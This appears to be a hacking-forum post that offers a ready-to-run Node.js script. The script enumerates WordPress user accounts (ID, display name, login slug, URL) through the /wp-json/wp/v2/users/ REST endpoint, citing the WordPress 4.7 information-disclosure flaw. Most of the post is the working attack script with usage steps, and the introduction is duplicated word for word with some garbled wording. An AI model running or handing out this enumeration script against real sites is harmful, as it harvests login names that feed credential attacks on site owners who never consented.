Hi Guys
Reveal WordPress accounts via /wp-json/wp/v2/users/ using Javascript to dump account name, and post name
wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 prior to 4.7.1, this allows remote attackers to obtain sensitive information feel through request wp-json/wp/v2/users.
Vulnerability level: 5.3 MEDIUM
Here is the result
How to use?
Run the following command to install the Axios library:
Reveal WordPress accounts via /wp-json/wp/v2/users/ using Javascript to dump account name, and post name
wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 prior to 4.7.1, this allows remote attackers to obtain sensitive information feel through request wp-json/wp/v2/users.
Vulnerability level: 5.3 MEDIUM
Here is the result
How to use?
Run the following command to install the Axios library:
Код:
npm install axios
JavaScript:
const axios = require('axios');
const url = ""; // Attaching a URL
const payload = "/wp-json/wp/v2/users/";
axios.get(url + payload)
.then(response => {
const users = response.data;
if (users.length > 0) {
console.log("*-----------------------------*");
users.forEach(user => {
console.log("
[*]ID : " + user.id);
console.log("
[*]Name : " + user.name);
console.log("
[*]User : " + user.slug);
console.log("
[*]Url : " + user.url);
console.log("");
});
console.log("*-----------------------------*");
} else {
console.log("
[*]No user");
}
})
.catch(error => {
console.error(error);
});
